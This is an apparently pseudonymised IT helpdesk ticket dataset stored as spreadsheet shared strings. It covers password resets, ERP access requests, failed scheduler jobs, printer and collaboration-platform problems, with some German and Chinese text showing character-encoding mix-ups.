    <t>reinstall eagl9111361 from scratch - device chrashes when entering stand by mode</t>
  </si>
  <si>
    <t>jksgwdyi greuqxko</t>
  </si>
  <si>
    <t>restore</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: trgqbeax.hfyzudql@gmail.com
please restore the complete file
HostName_598/hr_fd/mitarbeiter/azubis/â€¦
including all files under azubis
danke + viele grÃ¼ÃŸe
trgqbeax hfyzudql
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1378 failed in job_scheduler at: 83.69.48.194 04:28:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1378 failed in job_scheduler at: 83.69.48.194 04:28:00</t>
  </si>
  <si>
    <t xml:space="preserve">printer not working. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yhmzxcia.heszapvl@gmail.com_x000D_
_x000D_
hi it,_x000D_
_x000D_
please help to resolve our sg004 printer problem.  the printer is fine after printer technician check, it is to do with our cable and server ports in the server room._x000D_
_x000D_
we admin have no knowledge and capability to handle that. please have someone to help aerp._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>yhmzxcia heszapvl</t>
  </si>
  <si>
    <t>EU_tool, pls and wqw are working very slow.</t>
  </si>
  <si>
    <t>jltebswi zmvohjws</t>
  </si>
  <si>
    <t>schreibrechte fÃ¼r ksdvp3, ce_leiter</t>
  </si>
  <si>
    <t>on the english forms we are printing german instead of english</t>
  </si>
  <si>
    <t>there was a change in bank details made with ticket_no1557889.  this is not correctly printing on the english forms.  it is showing the correct data but the "descriptions" are in german. example. "bankverbindung instead of bank address,  konto nummer instead of account number"  i also see that there is an extra text being printed for the customers --   "bitte beachten sie unsere neue bankverbindung." "please note our new bank account details."   only the english version should print on the english documents, not both german and english.</t>
  </si>
  <si>
    <t>ujxvrlzg pkaegicn</t>
  </si>
  <si>
    <t>EU_tool jobs again not running, please help immediately</t>
  </si>
  <si>
    <t>released orders do not make it into the "to-do-list", please check the status and restart the system</t>
  </si>
  <si>
    <t>qmhikdzl zatcorjd</t>
  </si>
  <si>
    <t>is skype down?</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lenxvcbq.vwnhjtoi@gmail.com
i am not able to get into skype right now. is there an outage?
</t>
  </si>
  <si>
    <t>whenever i fill in any amount money into erp, it show me only 1rmb finally in the system.</t>
  </si>
  <si>
    <t xml:space="preserve">whenever i fill in any amount money into erp, it show me only 1rmb finally in the system. please contact withn me aerp.
my phone : </t>
  </si>
  <si>
    <t>facrghdv velfjros</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 83.69.48.194 03:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 83.69.48.194 03:26:00</t>
  </si>
  <si>
    <t>SID_1 - configair server responds with " 500   internal server error" in case of any other logon language than "en".</t>
  </si>
  <si>
    <t>configair server responds with " 500   internal server error" in case of any other logon language then "en" and the model "csewdwdwdndmill" is used. the issue exists in erp erp system SID_1 as well as on uacyltoe hxgayczedistributor_tool / uacyltoe hxgayczecompany center - quality environment..
further error message text is "  error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'".
logon language "en" is ok. if our "csscdddwsawdrill" model is used all language seem to be working fine. but once the user changes to any other language (e.g. de or it) and uses the model csewdwdwdndmill the configig air system responses with the error message during starting process of configair configurator.</t>
  </si>
  <si>
    <t>rednkluh lrpyvcxs</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 02:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 83.69.48.194 02:54:00</t>
  </si>
  <si>
    <t>unable to create delivery [urgent]</t>
  </si>
  <si>
    <t xml:space="preserve">plant_304 have 5pcs cannot created d/n for mm#6295171.our customer is very urgent this goods._x000D_
would you please help sloved? _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mgpfntcl mjoigcdb</t>
  </si>
  <si>
    <t>backup data</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ucdwyxko.apktrsyq@gmail.com_x000D_
_x000D_
dear sir,_x000D_
by mistake one of the folder in HostName_95/rk/7116 has been deleted._x000D_
requesting you to retrieve the same._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>ucdwyxko apktrsyq</t>
  </si>
  <si>
    <t>SID_34 - purchase requisition approval issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: izwtdnfq.xptuoaid@gmail.com_x000D_
_x000D_
hi it team,_x000D_
_x000D_
i cannot approve pr via the link provided. i only enable to approve directly in erp via me55._x000D_
_x000D_
kindly fix for me. </t>
  </si>
  <si>
    <t>seit 20.10.2016 06:00mesz serverprobleme qmsoft nicht anwendbar.</t>
  </si>
  <si>
    <t>qkedpfyj qechgaty</t>
  </si>
  <si>
    <t>ibm pmr#902s9kr:problem report from pwr8hmc1.hq.company.com</t>
  </si>
  <si>
    <t xml:space="preserve">
from:  toolonicserviceagent_pwr8hmc1@pwr8hmc1.hq.company.com
sent: wednesday, october 19, 2016 9:54 pm
to: 
subject: problem report from pwr8hmc1.hq.company.com
reporting system: pwr8hmc1
machine type-model/serial: 8284-22a/21e435v problem number: 101
error: b4141118
description: management console to fsp,bpa, or bpc failure detected last occurred: 10/19/16 9:40 pm current status:  
pmr number: n/a
details:  
</t>
  </si>
  <si>
    <t>GRP_47</t>
  </si>
  <si>
    <t>reset the password for arsbtkvd qieagkos on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: arsbtkvd.qieagkos@gmail.com_x000D_
_x000D_
good day!_x000D_
could you please reset password for erp?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>arsbtkvd qieagkos</t>
  </si>
  <si>
    <t>not able to add lean project into collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jhyazros.azdxonjg@gmail.com
[cid:image001.png@01d22ab4.97030051]
jkddwkwd.ngtr
assistant manager- manufacturing
company india limited
jhyazros.azdxonjg@gmail.com
</t>
  </si>
  <si>
    <t>prints (business_client)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vciknubg.wdlkabms@gmail.com
request access to get prints.  my id# is 21164311127.
</t>
  </si>
  <si>
    <t>vciknubg wdlkabms</t>
  </si>
  <si>
    <t xml:space="preserve">can't log in ticketing_tool </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso
user qzkyugce etsmnuba ( dondwdgj76) can't log on the ticketing_tool , the system display the user and password invalid , could you work on this ,</t>
  </si>
  <si>
    <t>network outage:cantabria (mecftgobusa) - (kenci) hard down since 10:01 pm on 10/19 et.site has no backup circuit</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______10:01 pm on 10/19 et_______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____na____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________na________________       _x000D_
_x000D_
12. notified  gsc  _____na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37stat failed in job_scheduler at: 10/19/2016 22:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37stat failed in job_scheduler at: 10/19/2016 22:11:00</t>
  </si>
  <si>
    <t xml:space="preserve"> mm # 2639483 iak-urgent</t>
  </si>
  <si>
    <t xml:space="preserve">from: kwddwdw hudfefwe 
sent: thursday, october 20, 2016 7:31 am
to: nwfodmhc exurcwkm
cc: rxoynvgi ntgdsehl; gzawrocy shbgwxeparamdnty
subject::fw: mm # 2639483 iak-urgent
it help,
please help check , it's urgent.
din,
in future please raise such issue to our it as well.
ap logistics manager
e: ovhtgsxd.dcqhnrmy@gmail.com
from: rxoynvgi ntgdsehl 
sent: thursday, october 20, 2016 9:21 am
to: gzawrocy shbgwxeparamdnty; johthryugftyson hu
cc:  kmvwxdti uaoyhcep; 
subject: re: mm # 2639483 iak
hi morning ,
this issue still not solve yet, i still encounter same issue the net weight higher than gross weight.
net weight 4777.1000 kgs and physical gross weight 5.000 kgs but in erp SID_34 vl03n shown it is correct.
attached for your reference.
hi morning, 
need your advice on this issue.
this is issue happen since last thursday still not solve yet. 
attached email flow for your reference.
ksjfye fekfeealleh
operation supervisor
email : rxoynvgi.ntgdsehl@gmail.com
from: 
sent: wednesday, october 19, 2016 7:20 pm
to: gzawrocy shbgwxeparamdnty
cc: kmvwxdti uaoyhcep; rxoynvgi ntgdsehl
subject: aw: mm # 2639483 iak
hello ,
itÂ´s done.
have a nice day
mit freundlichen grÃ¼ÃŸen
best </t>
  </si>
  <si>
    <t>ovhtgsxd dcqhnrmy</t>
  </si>
  <si>
    <t>the note which was always printed at bottom of the quotation was missing. please help to put it back.</t>
  </si>
  <si>
    <t xml:space="preserve">please see attachment, </t>
  </si>
  <si>
    <t>tfazwrdv upwonzvd</t>
  </si>
  <si>
    <t>erp locked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vqefplhm.mfpjaleo@gmail.com
hello,
my user id: yandfgs145. please help to unlock it.
</t>
  </si>
  <si>
    <t>vqefplhm mfpjaleo</t>
  </si>
  <si>
    <t>error erp /SID_34/sa38 /zsd_mexico_inwarehouse_tool_extract</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zvjwleuo.tdfqgcal@gmail.com_x000D_
_x000D_
i cannot run the erp /SID_34/sa38 /zsd_mexico_inwarehouse_tool_extract, shows an error:_x000D_
[cid:image001.png@01d22a3d.f7f2ecb0]_x000D_
[cid:image002.png@01d22a3d.f7f2ecb0]_x000D_
best </t>
  </si>
  <si>
    <t>zvjwleuo tdfqgcal</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform access issue </t>
  </si>
  <si>
    <t xml:space="preserve">first name: trtgoywdd
last name: povirttch
customer job title: sales engineer
contact #: 
email address: cmifnspg.icauzxfh@gmail.com
vitalyst reference number: 0bb7f42a37
was bomsdgar used? yes
description of problem: unable to access collaboration_platform site
if this problem persists, contact your support team and include these technical details: 
correlation id: SID_215af9d-3033-3000-ace7-0cf21c145e14 
date and time: 10/19/2016 4:04:23 pm 
user: cmifnspg.icauzxfh@gmail.com 
issue type: user does not have permissions. 
steps taken so far:
goes to the hub &gt; search &gt; lagp &gt; lagp request &gt; goes to form&gt; click on blue circle&gt; access denied message
previously had access to this site. 
</t>
  </si>
  <si>
    <t>cmifnspg icauzxfh</t>
  </si>
  <si>
    <t>access to SID_1</t>
  </si>
  <si>
    <t xml:space="preserve">i need access to SID_1 uacyltoe hxgaycze system:  
username:  owenssdcl12
supervisor:  phjencfg kwtcyazx
manager:  vnhaycfo smkpfjzv
wsjkbw owwddwens
accounting specialist
</t>
  </si>
  <si>
    <t>varldgiw hfyogqnj</t>
  </si>
  <si>
    <t>no authorization in apps</t>
  </si>
  <si>
    <t>vcnjqfta islabdft</t>
  </si>
  <si>
    <t>unable to log in to erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 10/19/2016 18:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 10/19/2016 18:15:00</t>
  </si>
  <si>
    <t>access to erp SID_1 for user rgpvdhcm mgvpabsj</t>
  </si>
  <si>
    <t>rgpvdhcm mgvpabsj</t>
  </si>
  <si>
    <t>folder access requested for HostName_768</t>
  </si>
  <si>
    <t>zugriff auf verzeichnis angefragt._x000D_
folder access requested. HostName_768_x000D_
_x000D_
benutzer id ?_x000D_
user id ?_x000D_
_x000D_
benutzer die position titel?_x000D_
user's position title ?_x000D_
_x000D_
verzeichnis? _x000D_
folder t:\corpbusinessdev\monthly financial review\fy17\2016-9&gt; (october 14, 2016) _x000D_
_x000D_
art des zugriffs?_x000D_
type of access ? (read only or full control) ?</t>
  </si>
  <si>
    <t>qkmgtnla buraxcij</t>
  </si>
  <si>
    <t xml:space="preserve">folder access request </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:need access to the following folder for our financial review t:\corpbusinessdev\monthly financial review\
i need to get read write.  i need to save files here &amp; be able to open them</t>
  </si>
  <si>
    <t>unlocked account</t>
  </si>
  <si>
    <t xml:space="preserve">pricing and availability look up in dynamics crm not working </t>
  </si>
  <si>
    <t>the attached screenshot is from ptljghyk qhtvlrxe.  she looked up a product that she knows we have.  the screen shows 0.</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool : not able to update new customer </t>
  </si>
  <si>
    <t>crjhotyk pxslorbe</t>
  </si>
  <si>
    <t>unable to access collaboration_platform</t>
  </si>
  <si>
    <t>gakceqyb edrjthvo</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open engineering_tool </t>
  </si>
  <si>
    <t>permission to create cost centers in SID_1 erp (transaction ks01)</t>
  </si>
  <si>
    <t xml:space="preserve">i no longer have access to create cost centers in SID_1/only SID_34.  please update access for cost center creation in the uacyltoe hxgayczeing system (SID_1).  transaction ks01.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>zujpycos pogmachd</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:having issues with collaboration_platform... unable to access
we have meetings that people have to post documents to the library and are not able to access...when will it be fixed??</t>
  </si>
  <si>
    <t xml:space="preserve"> static ip address </t>
  </si>
  <si>
    <t>it has been requested by our temporary service to provide them with a static ip address for a time clock that will be hard wired in. can you provide
contact # : 
summary: do i gear the request for a static ip address to this box for assistance</t>
  </si>
  <si>
    <t>collaboration_platform system not working</t>
  </si>
  <si>
    <t>the collaboration_platform system is not working. multiple users report getting an error trying to open any company.collaboration_platform.com website. this greatly affects the discount process as we cannot access any request or update approved ones. the error message which pops up is attached. this affects poznaÅ„ and usa.</t>
  </si>
  <si>
    <t>wgqkKupL esgahtqn</t>
  </si>
  <si>
    <t>cannot get my usb wifi adapter to work on my laptop.</t>
  </si>
  <si>
    <t>qzioyhud csehbrfy</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i was thrown off of vpn and tried several times to get back in. i am now back into vpn but cannot sign on to crm</t>
  </si>
  <si>
    <t>nibaotpy vmxathog</t>
  </si>
  <si>
    <t>collaboration_platform issue</t>
  </si>
  <si>
    <t>mknoeicg aziptqvu</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform down </t>
  </si>
  <si>
    <t>wsomjhce afjkuwih</t>
  </si>
  <si>
    <t>skype for business is not connected to the exchange.</t>
  </si>
  <si>
    <t xml:space="preserve">ihuogcqd ihusvgcw phone.   my skype for business can't connect to exchange. this has been going on all week. i have rebooted and logged back into skype but it will not connect and i keep getting this error.   </t>
  </si>
  <si>
    <t>ihuogcqd ihusvgcw</t>
  </si>
  <si>
    <t>the company collaboration_platform is reporting a  down status since 10/19/2016 2:33 pm</t>
  </si>
  <si>
    <t>vip 1: collaboration_platform page access issue</t>
  </si>
  <si>
    <t>lqdpfamz mqitfrcv</t>
  </si>
  <si>
    <t>when running sa38 report zsdr0100, open order report, the report is not pulling usa scheduling agreements</t>
  </si>
  <si>
    <t>when running the report, example would be mm # 2123340 for location plant_92 as the source location, and making sure on the outputs tab, that scheduling agreements are included.  this report is not picking up this scheduling agreement 4111333643/000010/0049????</t>
  </si>
  <si>
    <t>no boot : service tag : 5lkzddens1</t>
  </si>
  <si>
    <t>windows running into problem : goes to start up repair page.
loading fine in safe mode with networking.
user was able to log in using admin account.but dint dint have access to it.
tried shutting down pc and trying booting up...no go
flea power ..no go..
it was going to repair screen again and again ..
st : 5lkzddens1
contact details : 
can be contacted during 7:00am-4:00pm</t>
  </si>
  <si>
    <t>qdtywmkv aolijwnx</t>
  </si>
  <si>
    <t>HostName_1003 : volume: c:\ label:sys-HostName_1003 543aa385 is over 85% space consumed. space available: 4.5 g.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1003 : volume: c:\ label:sys-HostName_1003 543aa385 is over 85% space consumed. space available: 4.5 g._x000D_
</t>
  </si>
  <si>
    <t>i need my address added to xerox prtqx7300</t>
  </si>
  <si>
    <t>lrhfoxen hlqsumgx</t>
  </si>
  <si>
    <t xml:space="preserve">personal number :  locked : expense report </t>
  </si>
  <si>
    <t>uyhceqzr tpbdwiyv</t>
  </si>
  <si>
    <t>erp SID_37 password reset</t>
  </si>
  <si>
    <t>mpihysnw wrctgoan</t>
  </si>
  <si>
    <t>it_ passwort</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: soldfnbq.uhnbsvqd@gmail.com
hallo,
ersuche alle meine passwÃ¶rter zurÃ¼ckzusetzen, da gesperrt. crm,erp,vpn
hello,
all my passwords are locked. crm, erp, vpn
mit freundlichen grÃ¼ÃŸen/ best </t>
  </si>
  <si>
    <t>soldfnbq uhnbsvqd</t>
  </si>
  <si>
    <t>skype and outlook synch issue , meeting are not showing up in skype,</t>
  </si>
  <si>
    <t>skype and outlook synch issue , meeting are not showing up in skype,_x000D_
error message attached_x000D_
_x000D_
error message : skype for business and exchange aren't making a connection</t>
  </si>
  <si>
    <t>outlook hang</t>
  </si>
  <si>
    <t>unable to open the outlook its hang at process stage</t>
  </si>
  <si>
    <t>this message was sent to the company quarantine database. please contact company it help desk for more information</t>
  </si>
  <si>
    <t xml:space="preserve">from: ncasrpvx fijwprtv 
sent: wednesday, october 19, 2016 6:24 pm
to: nwfodmhc exurcwkm
subject:  tr: notification: re: po #no ds00784fd9b60
hello
could you check this message 
</t>
  </si>
  <si>
    <t>ncasrpvx fijwprtv</t>
  </si>
  <si>
    <t>companyguest account for 2 days</t>
  </si>
  <si>
    <t>mechmet hswddwk
company:sllwdw75
tel.
email: m.hswddwk@wsjsoiwd8yw.de
period: from now til tomorrow at 6mp</t>
  </si>
  <si>
    <t>unable to print. driver not found.</t>
  </si>
  <si>
    <t>khrflgcj zxojidhe</t>
  </si>
  <si>
    <t>stvpxkbf gqchobaj</t>
  </si>
  <si>
    <t>no access to ethics. see below failure message...</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>jkuaslxe hrodszpl</t>
  </si>
  <si>
    <t xml:space="preserve">needs to change password </t>
  </si>
  <si>
    <t>cukzsyjo lxspyctf</t>
  </si>
  <si>
    <t>fails to log in to erp and engineering tool</t>
  </si>
  <si>
    <t>i changed my password using the password manager and now i am locked out of erp. i used the password manager to unlock but still fails to log in to erp and engineering tool</t>
  </si>
  <si>
    <t>hftanwjr lhdqcwsr</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1318 failed in job_scheduler at: 10/19/2016 10:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1318 failed in job_scheduler at: 10/19/2016 10:40:00</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open netweaver </t>
  </si>
  <si>
    <t>ueqoimkc mhqyzklv</t>
  </si>
  <si>
    <t>skype is not functioning</t>
  </si>
  <si>
    <t>trying to use skype, is not responding, was working earlier</t>
  </si>
  <si>
    <t>mscgnafj bvftidka</t>
  </si>
  <si>
    <t>vip 1 :user unable to login to the pc.</t>
  </si>
  <si>
    <t>vip 1 :user unable to login to the pc._x000D_
-advised the user to restart the pc and try to login with the new password.no go_x000D_
-reset and help the user login to the pc._x000D_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</si>
  <si>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jetgpdqn rpfqxzvb</t>
  </si>
  <si>
    <t>employment status - new non-employee ycgkinov czoparqg @ us03 temp 10.20.16</t>
  </si>
  <si>
    <t>*page down to ensure that all required data fields are complete before submitting*
use this template for consultants, temps, interns, vendors, etc.                   please complete all entries.
**id 21111594
first name ?johddnthay
last name ?welwsswbtwe
location ?usa us03
manager / sponsor ?keddsdn wethrybb
cost center ?bdm025
external company name ?kellkwdy
what systems do they need access on ?mii
mii? yes
         if yes â€“ is user operator, admin or supervisor?operator need username and p/word
security note: for mii â€“ add im:shopfloor_user_* to user's SID_34 account
is company email required for this person ?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requires access until (date) ?
is the computer owned by company ?
     if yes, is it a laptop or desktop ?                      computer name:
is remote access/vpn required ?
if yes, please provide to which all applications, erp systems, network servers the user needs access via vpn.
start date ?10.20.16</t>
  </si>
  <si>
    <t>lfikjasz tjbqcmvl</t>
  </si>
  <si>
    <t>business_clientæ— æ³•ç™»å…¥</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ktghvuwr.uwtakcmj@gmail.com
hello
å…³äºŽbusiness_clientæ— æ³•ç™»å…¥çš„é—®é¢˜è¯·å¸®å¿™è§£å†³ï¼Œå³æ‰“å¼€business_clientè½¯ä»¶ï¼ŒçŽ°åœ¨æ— æ³•ç™»å…¥:
1ï¼Žè¿žæŽ¥vpnåŽï¼Œä»Žè½¯ä»¶ç«¯ç™»å…¥ä¸è¡Œï¼Œæ˜¾ç¤ºå¦‚ä¸‹ï¼š
[cid:image001.jpg@01d22a56.4f7ef4c0]
2ï¼Žä»Žç½‘é¡µç‰ˆç™»å…¥ï¼Œæ˜¾ç¤ºå¦‚ä¸‹ï¼Œå‡ºæ— æ³•ç™»å…¥ï¼š
[cid:image002.jpg@01d22a56.4f7ef4c0]
ktghvuwr uwtakcmj
sr. application engineer
optimization team
ktghvuwr.uwtakcmj@gmail.com&lt;mailto:ktghvuwr.uwtakcmj@gmail.com&gt;</t>
  </si>
  <si>
    <t>ktghvuwr uwtakcmj</t>
  </si>
  <si>
    <t xml:space="preserve">company guest account set up </t>
  </si>
  <si>
    <t>vmqcyzda kgvrfwcj</t>
  </si>
  <si>
    <t xml:space="preserve">in our west coast email box, we can grab an email and color code it, but it is not undating </t>
  </si>
  <si>
    <t>not updating so that the other 3 people working the email box can see who has each email, , so we are duplicating work</t>
  </si>
  <si>
    <t>wlhxrogv yawtxuod</t>
  </si>
  <si>
    <t>query regarding unread sync failure emails</t>
  </si>
  <si>
    <t>unable to login to mii system : yrhackgt sfhxckgq</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to mii system : yrhackgt sfhxckgq_x000D_
_x000D_
checked account and found that it was not locked out._x000D_
suggested user to unlock account from password_management_tool and try logging in again some time._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>djlpawmc nyzwqofu</t>
  </si>
  <si>
    <t>unable to launch ethics. flash player issue.</t>
  </si>
  <si>
    <t>ebikdrqw empubwxo</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access e-time. </t>
  </si>
  <si>
    <t>pls reset me the SID_39 crm production access</t>
  </si>
  <si>
    <t>name:francestrhuco
language:
browser:microsoft internet explorer
email:uvdqkbgi.suabfdci@gmail.com
customer number:
telephone:
summary:pls reset me the SID_39 crm production access
 thx</t>
  </si>
  <si>
    <t>uvdqkbgi suabfdci</t>
  </si>
  <si>
    <t>cannot get thru to customer application support, something wrong with the phone #, you get a mesaage</t>
  </si>
  <si>
    <t xml:space="preserve">their number is </t>
  </si>
  <si>
    <t>microsoft outlook not responding, cannot open</t>
  </si>
  <si>
    <t xml:space="preserve">krthdelly sthytachnik, phone , usa location, login </t>
  </si>
  <si>
    <t>called to unlock nvyjtmca xjhpznds account user id : datacntr</t>
  </si>
  <si>
    <t>bitte scanner fÃ¼r we111 einstellen.drucker wurde auf werkseinstellung zurÃ¼ckgesetzt (konica ).</t>
  </si>
  <si>
    <t>help to change the windows password using password_management_tool password tool.
-connected to the user system using teamviewer.
-help the user login to the password_management_tool password tool and change the passwords.
-help the user to sync the psswords to the company network.
-caller confirmed that he was able to login.
-issue resolved.</t>
  </si>
  <si>
    <t>bei herrn potthryzler (benutzerkennung: potsffwzlo) geht EU_tool am rechner: empw8111201a nicht.</t>
  </si>
  <si>
    <t xml:space="preserve">fehlermeldung: systemfehler &amp;h91115116 
with mr. potthryzler (user identification: potzlow) EU_tool does not go to the computer: empw8111201a.
error message: system error &amp; h91115116 </t>
  </si>
  <si>
    <t>probleme mit login in br \usalikfj lfmpxbcn</t>
  </si>
  <si>
    <t>erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tdkfuobm.qrtmaxos@gmail.com
good morning,
i am unable to log into my erp as normal.  after review with doyhtuug endlkglfeghart, it was determined this was from the switchover of servers.
can you please correct so i can log in as normal?
</t>
  </si>
  <si>
    <t>tdkfuobm qrtmaxos</t>
  </si>
  <si>
    <t>unable to login to SID_1</t>
  </si>
  <si>
    <t>svhuewoy dluchbfg</t>
  </si>
  <si>
    <t xml:space="preserve">winwip not working , asking to buy trial version validity expired </t>
  </si>
  <si>
    <t>erp ksff dashbankrds - need to push to computer lrrw7403548</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dpuifqeo.eglwsfkn@gmail.com
please push the erp mii ksff dashbankrd to this computer
</t>
  </si>
  <si>
    <t>dpuifqeo eglwsfkn</t>
  </si>
  <si>
    <t>need access to erp SID_1 like rpgcdbfa reuwibpt</t>
  </si>
  <si>
    <t>user needs help to login to erp SID_34.</t>
  </si>
  <si>
    <t>user needs help to login to erp SID_34._x000D_
-connected to the user system using teamviewer._x000D_
-help the userlogin to the erp SID_34._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>sidyuncg ptvogsxa</t>
  </si>
  <si>
    <t>need the configuration of new pc</t>
  </si>
  <si>
    <t>xbjrphgk unbzmyhk</t>
  </si>
  <si>
    <t xml:space="preserve">it training - polycom </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lkfzibrx.ljnabpgx@gmail.com_x000D_
_x000D_
hellow_x000D_
_x000D_
can someone help me to install polycom i have some issues_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">can you please give me access to the SID_1 uacyltoe hxgaycze system. user pildladjadga
</t>
  </si>
  <si>
    <t>vtzhelgs ivewqogm</t>
  </si>
  <si>
    <t>acces to SID_1</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgpvdhcm.mgvpabsj@gmail.com_x000D_
_x000D_
hello,_x000D_
due to travel_tool uacyltoe hxgayczeing please allow me to acces to q-11._x000D_
</t>
  </si>
  <si>
    <t>my collaboration_platform and sync keeps prompting for a password.</t>
  </si>
  <si>
    <t>i changed my password yesterday, ever since i keep getting messages to enter my email and password, i do and nothing happens, i again get prompted to enter it. my one note is not syncing because of this issue, evry time i work with a file i keep getting the prompt.</t>
  </si>
  <si>
    <t>geylvotd msadrzkj</t>
  </si>
  <si>
    <t>npc in erp system stuck due to employees leaving the company</t>
  </si>
  <si>
    <t>npc 311190814 was created by svuxizgr mkynswqd before she left the company.  task list looked complete before she left, the materials are not fert.  i re-assigned coordinator and tasks to me but it wont complete.</t>
  </si>
  <si>
    <t>fgaulydz crswlkev</t>
  </si>
  <si>
    <t>re: ticket_no1538187::cpp user ids - password change needed for 3 users - please assign to bokrgadgsu esdwduobrlcn</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wibovsru.ulmqyhsk@gmail.com
hello drwfubia,
per our conversation, in two cases below i am unable to change the passwords because the erp system passwords are not reset to daypay3. i do not know who this ticket should be assigned to. i created the ticket and it was assigned by someone to you. if it has to go to someone else, please reassign it accordingly.
cphemg02 - erp SID_34 - account locked - login not possible
cphemg02 - erp SID_39 - account locked - login not possible
</t>
  </si>
  <si>
    <t>wibovsru ulmqyhsk</t>
  </si>
  <si>
    <t>need access to \\eagcldaten\aese\leitung\csd_emealeitung</t>
  </si>
  <si>
    <t>mdfugwzt wbcaqkgr</t>
  </si>
  <si>
    <t>folder deletion from s: drive</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hjokrfpv.fhpaxsqc@gmail.com_x000D_
_x000D_
hello all,_x000D_
_x000D_
could you please help me retrieving the deleted folder from s drive._x000D_
below was the link. now it's not here. folder name: vacation plan._x000D_
vacation plan update (file://HostName_95/teams/globalengservices/12tcb_graphics/vacation%20plan/team%20vacation%20updates%202016.xlsx_x000D_
_x000D_
please support_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hjokrfpv fhpaxsqc</t>
  </si>
  <si>
    <t>not able to view drawings in business_client</t>
  </si>
  <si>
    <t>tvirflky febluink</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37filesys failed in job_scheduler at: 10/19/2016 06:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37filesys failed in job_scheduler at: 10/19/2016 06:31:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_736 failed in job_scheduler at: 10/19/2016 06:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_736 failed in job_scheduler at: 10/19/2016 06:31:00</t>
  </si>
  <si>
    <t>impact award</t>
  </si>
  <si>
    <t xml:space="preserve">
